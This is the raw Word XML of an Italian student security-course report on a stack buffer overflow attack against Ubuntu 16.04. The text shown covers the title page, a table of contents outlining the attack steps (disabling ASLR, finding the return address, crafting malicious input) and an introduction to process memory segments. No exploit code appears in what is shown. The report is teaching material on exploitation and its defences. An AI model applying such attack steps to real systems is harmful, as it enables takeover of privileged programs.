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485E7" w14:textId="4951E17C" w:rsidR="005845AE" w:rsidRPr="00711920" w:rsidRDefault="005845AE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b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6862464D" w14:textId="77777777" w:rsidR="00491C83" w:rsidRPr="00711920" w:rsidRDefault="00491C83" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39497CBC" w14:textId="52AC2DE3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i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C5116E" w14:textId="77777777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i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BE65A2" w14:textId="6E3A8AAA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i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E69690" w14:textId="77777777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i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4C36A6" w14:textId="13EAFF1B" w:rsidR="00840516" w:rsidRPr="00711920" w:rsidRDefault="00840516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i/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Buffer Overflow Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779A19CF" w14:textId="77777777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6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D80EB1" w14:textId="56B84E21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6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Sicurezza</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Informatica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D37E0C" w14:textId="77777777" w:rsidR="00491C83" w:rsidRPr="00711920" w:rsidRDefault="00491C83" w:rsidP="00711920">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E91A098" w14:textId="77777777" w:rsidR="00491C83" w:rsidRPr="00711920" w:rsidRDefault="00491C83" w:rsidP="00711920">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C171382" w14:textId="77777777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en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CAA744" w14:textId="77777777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en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72B8F3FC" w14:textId="77777777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en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C04CFC" w14:textId="77777777" w:rsidR="00491C83" w:rsidRPr="008E105D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73D348EB" w14:textId="77777777" w:rsidR="00491C83" w:rsidRPr="008E105D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49F8EF6C" w14:textId="77777777" w:rsidR="00491C83" w:rsidRPr="008E105D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7037C953" w14:textId="77777777" w:rsidR="00491C83" w:rsidRPr="008E105D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79ABD283" w14:textId="77777777" w:rsidR="00491C83" w:rsidRPr="008E105D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2"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529DE856" w14:textId="5E72A12E" w:rsidR="00491C83" w:rsidRPr="00711920" w:rsidRDefault="005845AE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2"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Andrea Spreafico 793317</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9E4151" w14:textId="30C16D12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2"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0782132D" w14:textId="77777777" w:rsidR="005448D1" w:rsidRPr="00711920" w:rsidRDefault="005448D1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2"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1106C34B" w14:textId="1BDF2E55" w:rsidR="005845AE" w:rsidRPr="00711920" w:rsidRDefault="00491C83" w:rsidP="00711920">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/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711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>2019/2020</w:t>
      </w:r>
      <w:r w:rsidR="005845AE" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E115941" w14:textId="77777777" w:rsidR="0091342A" w:rsidRPr="00711920" w:rsidRDefault="0091342A" w:rsidP="00711920">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F6519C0" w14:textId="1E6F10D0" w:rsidR="00711920" w:rsidRPr="00711920" w:rsidRDefault="00711920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Indice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0C74FA" w14:textId="77777777" w:rsidR="00711920" w:rsidRPr="00711920" w:rsidRDefault="00711920" w:rsidP="00711920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01689558" w14:textId="6E1454F7" w:rsidR="00CD6192" w:rsidRPr="00711920" w:rsidRDefault="00CD6192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711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scopo del progetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D8E4D" w14:textId="77777777" w:rsidR="00CD6192" w:rsidRPr="00711920" w:rsidRDefault="00CD6192" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/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54C82FE8" w14:textId="79238B9A" w:rsidR="00CD6192" w:rsidRPr="00711920" w:rsidRDefault="00CD6192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711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilità del Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F10DF34" w14:textId="128BD8CE" w:rsidR="00CD6192" w:rsidRPr="00711920" w:rsidRDefault="00CD6192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711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Protezioni contro Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A09072B" w14:textId="77777777" w:rsidR="00CD6192" w:rsidRPr="00711920" w:rsidRDefault="00CD6192" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:spacing w:line="276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00D57A51" w14:textId="0C97F198" w:rsidR="00CD6192" w:rsidRPr="00E93A64" w:rsidRDefault="00CD6192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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Esempio documentato di attacco Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F386831" w14:textId="77777777" w:rsidR="00E93A64" w:rsidRDefault="00E93A64" w:rsidP="0014758D">
      <w:pPr>
        <w:pStyle w:val="Standard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>Disabilitare ASLR del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1C0EAA" w14:textId="3FACA2E8" w:rsidR="00E93A64" w:rsidRPr="00E93A64" w:rsidRDefault="00E93A64" w:rsidP="0014758D">
      <w:pPr>
        <w:pStyle w:val="Standard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>Creare u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">n esempio di </w:t>
      </w:r>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>programma vulnerabile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6ACF0A" w14:textId="77777777" w:rsidR="00E93A64" w:rsidRPr="00E93A64" w:rsidRDefault="00E93A64" w:rsidP="0014758D">
      <w:pPr>
        <w:pStyle w:val="Standard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lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93A64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Controllare che l’ASLR sia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>disabilitato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0EC575" w14:textId="099A0322" w:rsidR="00566756" w:rsidRDefault="00E93A64" w:rsidP="0014758D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco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</w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r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Individuare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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il</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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Return Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F16DA22" w14:textId="77777777" w:rsidR="00E93A64" w:rsidRPr="00711920" w:rsidRDefault="00E93A64" w:rsidP="0014758D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco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</w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r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Generare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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l’input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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malizioso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DCBFD9C" w14:textId="77777777" w:rsidR="00653DAA" w:rsidRDefault="00E93A64" w:rsidP="00653DAA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco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 w:rsidRPr="00E93A64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Eseguire il programma vulnerabile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3CE2B2" w14:textId="5A57C872" w:rsidR="00653DAA" w:rsidRPr="00653DAA" w:rsidRDefault="00653DAA" w:rsidP="00653DAA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco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 w:rsidRPr="00653DAA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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00653DAA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Risoluzione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00653DAA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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00653DAA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problemi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26855667" w14:textId="77777777" w:rsidR="0014758D" w:rsidRPr="00E93A64" w:rsidRDefault="0014758D" w:rsidP="0014758D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440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</w:p>
    <w:p w14:paraId="1F43E757" w14:textId="296B3CB3" w:rsidR="00566756" w:rsidRPr="00566756" w:rsidRDefault="00566756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Referenze e Tutorial utili</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52608329" w14:textId="77777777" w:rsidR="008E105D" w:rsidRDefault="008E105D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6EB6E09" w14:textId="268EE128" w:rsidR="00A7298C" w:rsidRPr="00711920" w:rsidRDefault="00711920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1) </w:t>
      </w:r>
      <w:r w:rsidR="00A7298C" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Scopo del progetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF8C14" w14:textId="6E3AE147" w:rsidR="00711920" w:rsidRPr="00711920" w:rsidRDefault="0091342A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>Lo scopo di questo progetto è quello di implementare e documentare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un </w:t>
      </w:r>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>attacco di tipo Buffer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</w:t>
      </w:r>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>O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verflow su una macchina ospitate Linux, in particolare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A7298C" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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16.04. Non solo questo progetto va ad analizzare e discutere i fattori principali di un attacco di questo genere, ma va</w:t>
      </w:r>
      <w:r w:rsidR="004F25E6" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> a documentare e spiegare nel dettaglio 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>un’implementazione pratica dell’attacco. Infine, sono stati riportate anche tecniche e tool che potrebbero aiutare gli utenti a fronteggiare una vulnerabilità di questo tipo sulla propria macchina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E835EB5" w14:textId="12491165" w:rsidR="00840516" w:rsidRPr="00711920" w:rsidRDefault="00711920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840516" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Vulnerabilità del Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D3B93" w14:textId="3195DC95" w:rsidR="00840516" w:rsidRPr="00711920" w:rsidRDefault="00840516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 xml:space="preserve">Lo scopo complessivo di un attacco di buffer overflow è di sovvertire la funzione di un programma privilegiato in modo che l'attaccante possa prendere il controllo di quel programma, e, se esso è sufficientemente privilegiato, controllare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>l'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Tipicamente </w:t>
      </w:r>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>lo scopo finale di un’attaccante è quello di</w:t>
      </w:r>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ottenere una shell con i privilegi di root</w:t>
      </w:r>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C1792" w14:textId="656114E7" w:rsidR="00106F18" w:rsidRPr="00711920" w:rsidRDefault="00106F1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BCEB953" w14:textId="0C55A8B3" w:rsidR="00106F18" w:rsidRPr="00711920" w:rsidRDefault="00106F1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>Prima di poter</w:t>
      </w:r>
      <w:r w:rsidR="00C35B5D" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> capire come funziona effettivamente un attacco di tipo Buffer Overflow, bisogna capire come i dati di un processo vengono gestiti all’interno memoria. Infatti, ciascun processo eseguito su una macchina necessita dello spazio di memoria dove salvare i dati elaborati o da elaborare. Tipicamente un programma C divide lo spazio in memoria in 5 segmenti:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D359F23" w14:textId="77777777" w:rsidR="00C75F93" w:rsidRPr="00711920" w:rsidRDefault="00C75F93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3EE706E4" w14:textId="5570C648" w:rsidR="00C35B5D" w:rsidRPr="00711920" w:rsidRDefault="00C35B5D" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Text </w:t>
      </w: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Segment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Pr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> viene memorizzato il codice effettivo del programma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A77269" w14:textId="74AFD410" w:rsidR="00C35B5D" w:rsidRPr="00711920" w:rsidRDefault="00C35B5D" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Data </w:t>
      </w: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Segment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Pr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C5EFF" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>vengono memorizzate le variabili statiche o globali inizializzate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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBFE2A2" w14:textId="2DA3AB2C" w:rsidR="00C35B5D" w:rsidRPr="00711920" w:rsidRDefault="00C35B5D" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">BSS </w:t>
      </w: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Segment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="008C5EFF" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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>vengono memorizzate le variabili statiche o globali non inizializzate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4F280" w14:textId="71CCA9A8" w:rsidR="00C35B5D" w:rsidRPr="00711920" w:rsidRDefault="00C35B5D" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Heap: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zona di memoria che permette l’allocazione dinamica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9C77F4" w14:textId="56A891C0" w:rsidR="00A7298C" w:rsidRPr="00711920" w:rsidRDefault="00C35B5D" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Stack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zona di memoria in cui vengono memorizzate le variabili locali all’interno delle funzioni del processo, ma anche dati utilizzate dalle funzioni stesse come il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A7298C" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A7298C" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A7298C" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>, argomenti…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C0FC8" w14:textId="79C13CD5" w:rsidR="00106F18" w:rsidRPr="00711920" w:rsidRDefault="00106F1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0547A8AD" w14:textId="0200F334" w:rsidR="00A7298C" w:rsidRPr="00711920" w:rsidRDefault="00A7298C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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24DDD5BB" wp14:editId="376160D8">
            <wp:extent cx="1946163" cy="1955653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4566" cy="196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FE6C" w14:textId="54704859" w:rsidR="00A7298C" w:rsidRPr="00711920" w:rsidRDefault="00A7298C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>Struttura della memoria di un programma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729459BE" w14:textId="77777777" w:rsidR="00A7298C" w:rsidRPr="00711920" w:rsidRDefault="00A7298C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</w:p>
    <w:p w14:paraId="7D819184" w14:textId="77777777" w:rsidR="00711920" w:rsidRDefault="00711920">
      <w:pP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Theme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF68B96" w14:textId="61F15590" w:rsidR="00C75F93" w:rsidRPr="00711920" w:rsidRDefault="00A7298C" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Un attacco di tipo Buffer Overflow può avvenire sia all’interno dello Heap sia all’interno dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00394F63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>tack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">. In questo lavoro ci concentreremo su un attacco basato sullo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711920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Pr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB4E287" w14:textId="449B1161" w:rsidR="00840516" w:rsidRPr="00711920" w:rsidRDefault="00A7298C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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29C90571" wp14:editId="311CA4E7">
